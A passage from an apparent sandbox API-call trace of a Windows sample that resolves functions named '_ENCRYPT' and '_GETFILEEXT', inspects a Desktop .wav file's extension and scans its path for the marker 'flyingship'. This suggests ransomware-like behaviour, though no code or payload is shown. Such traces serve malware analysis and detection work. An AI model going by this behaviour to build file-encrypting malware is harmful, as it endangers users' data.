hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0161.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0161.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0161.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0161.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0161.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0161.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0161.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0161.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0161.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0161.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0161.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0161.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0161.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0161.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0161.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0161.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0161.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0161.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0161.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0161.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0161.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0161.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0161.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0161.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0161.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0161.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0161.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0161.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0161.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0161.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0161.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0161.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0161.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0161.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0161.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0161.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0161.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0161.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0161.276] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0161.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0161.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0161.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0161.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0161.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0161.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0161.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0161.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0161.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0161.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0161.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0161.277] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0161.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0161.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0161.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0161.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0161.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0161.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0161.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0161.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0161.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0161.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0161.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0161.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0161.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0161.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0161.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0161.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0161.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0161.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0161.278] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0161.278] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0161.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0161.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0161.278] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0161.278] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0161.278] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0161.278] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0161.278] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0161.278] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0161.278] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0161.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0161.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0161.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0161.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0161.278] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0161.278] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0161.278] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0161.278] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0161.278] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0161.278] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0161.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0161.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0161.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0161.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0161.278] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0161.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0161.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0161.279] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0161.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba4e0 [0161.279] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9ba4e0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0161.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0161.279] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0161.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0161.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0161.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0161.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0161.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0161.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0161.279] CloseHandle (hObject=0x120) returned 1 [0161.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0161.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0161.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0161.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0161.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0161.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0161.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0161.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0161.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0161.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0161.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0161.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0161.280] FreeLibrary (hLibModule=0x75990000) returned 1 [0161.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0161.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0161.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0161.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0161.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0161.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0161.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0161.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0161.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0161.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0161.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0161.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0161.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0161.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0161.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0161.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0161.280] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0161.280] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0161.280] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0161.280] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0161.280] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0161.280] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0161.280] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0161.280] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0161.280] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0161.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0161.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0161.281] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0161.281] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0161.281] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0161.281] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gJmnMJqziFMsIe_.wav", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f29a7a0, ftCreationTime.dwHighDateTime=0x1d5e792, ftLastAccessTime.dwLowDateTime=0xea88a2f0, ftLastAccessTime.dwHighDateTime=0x1d5e311, ftLastWriteTime.dwLowDateTime=0xea88a2f0, ftLastWriteTime.dwHighDateTime=0x1d5e311, nFileSizeHigh=0x0, nFileSizeLow=0x14234, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="gJmnMJqziFMsIe_.wav", cAlternateFileName="GJMNMJ~1.WAV")) returned 0x90add8 [0161.282] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0161.282] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0161.283] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gJmnMJqziFMsIe_.wav", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f29a7a0, ftCreationTime.dwHighDateTime=0x1d5e792, ftLastAccessTime.dwLowDateTime=0xea88a2f0, ftLastAccessTime.dwHighDateTime=0x1d5e311, ftLastWriteTime.dwLowDateTime=0xea88a2f0, ftLastWriteTime.dwHighDateTime=0x1d5e311, nFileSizeHigh=0x0, nFileSizeLow=0x14234, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="gJmnMJqziFMsIe_.wav", cAlternateFileName="GJMNMJ~1.WAV")) returned 0x90add8 [0161.283] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0161.283] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0161.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gJmnMJqziFMsIe_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gJmnMJqziFMsIe_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gJmnMJqziFMsIe_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gJmnMJqziFMsIe_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gJmnMJqziFMsIe_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Desktop\\gJmnMJqziFMsIe_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Desktop\\gJmnMJqziFMsIe_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Desktop\\gJmnMJqziFMsIe_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Desktop\\gJmnMJqziFMsIe_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Desktop\\gJmnMJqziFMsIe_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Desktop\\gJmnMJqziFMsIe_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Desktop\\gJmnMJqziFMsIe_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Desktop\\gJmnMJqziFMsIe_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Desktop\\gJmnMJqziFMsIe_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Desktop\\gJmnMJqziFMsIe_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Desktop\\gJmnMJqziFMsIe_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Desktop\\gJmnMJqziFMsIe_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Desktop\\gJmnMJqziFMsIe_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Desktop\\gJmnMJqziFMsIe_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Desktop\\gJmnMJqziFMsIe_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Desktop\\gJmnMJqziFMsIe_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Desktop\\gJmnMJqziFMsIe_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Desktop\\gJmnMJqziFMsIe_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Desktop\\gJmnMJqziFMsIe_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Desktop\\gJmnMJqziFMsIe_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Desktop\\gJmnMJqziFMsIe_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Desktop\\gJmnMJqziFMsIe_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Desktop\\gJmnMJqziFMsIe_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Desktop\\gJmnMJqziFMsIe_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Desktop\\gJmnMJqziFMsIe_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Desktop\\gJmnMJqziFMsIe_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop\\gJmnMJqziFMsIe_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop\\gJmnMJqziFMsIe_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.284] CompareStringW (Locale=0x400, 